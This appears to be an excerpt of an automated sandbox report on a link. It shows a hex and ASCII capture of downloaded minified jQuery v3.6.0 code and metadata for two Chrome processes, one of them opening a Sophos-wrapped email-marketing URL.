                                                2024-08-20 13:42:14 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                2024-08-20 13:42:14 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                2024-08-20 13:42:14 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                2024-08-20 13:42:14 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                2024-08-20 13:42:14 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                2024-08-20 13:42:14 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                2024-08-20 13:42:14 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                2024-08-20 13:42:14 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                2024-08-20 13:42:14 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                2024-08-20 13:42:14 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                Click to jump to process

                                                Click to jump to process

                                                Click to jump to process

                                                Target ID:0
                                                Start time:09:40:46
                                                Start date:20/08/2024
                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://us-west-2.protection.sophos.com/?d=sendibm3.com&u=aHR0cHM6Ly9lOWRqNy5yLmFnLmQuc2VuZGlibTMuY29tL21rL2NsL2Yvc2gvT3ljWnZIdUZvMWVRc25iY0tMWktJREVHL2NnVmNyV21hWFhrZg==&i=NThlN2NjYzYyOTljZjkxNGY4YmM0YmNh&t=VnQ2OXdVTk5pNGo3ZVpJdGxqM3hWU01RTFNlTTR3MVJQYzE0U1QzTnJSWT0=&h=3051c7643cbf456abcee4da5b8589e9f&s=AVNPUEhUT0NFTkNSWVBUSVZ8AqEkCzalfWzVtfa3JPWpqexIqdRxhnkmNvFrX5FCFHbzmUEDyREh-sSR_GxUDZUFP4_iKFiHHCQrvBd4vpKuC2uTI8TlTsM5VBshiKK92DyKYTjtekCdl7a_yoDRBqg
                                                Imagebase:0x7ff7f9810000
                                                File size:3'242'272 bytes
                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:false

                                                Target ID:1
                                                Start time:09:40:46
                                                Start date:20/08/2024
                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1968,i,4422493508800080892,16665077100818751429,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                Imagebase:0x7ff7f9810000
                                                File size:3'242'272 bytes
                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:false

                                                No disassembly